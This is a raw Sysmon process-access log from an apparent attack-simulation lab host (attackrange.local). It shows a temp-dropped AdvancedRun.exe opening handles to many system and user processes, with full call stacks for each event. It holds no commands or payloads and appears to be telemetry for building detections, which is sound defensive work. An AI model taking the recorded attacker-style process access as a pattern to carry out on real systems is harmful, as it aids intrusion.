19:56:09.241{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-B005-000000002702}108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057121Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.241{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057120Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.241{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004057119Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.240{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet 
Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004057118Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.240{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004057117Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.240{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004057116Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.240{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004057115Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.240{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004057114Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.235{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057085Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.233{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004057084Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.233{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057083Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.233{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057082Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.232{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057081Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.232{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057080Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.232{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057079Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.231{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057078Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
19:56:09.231{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004057077Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
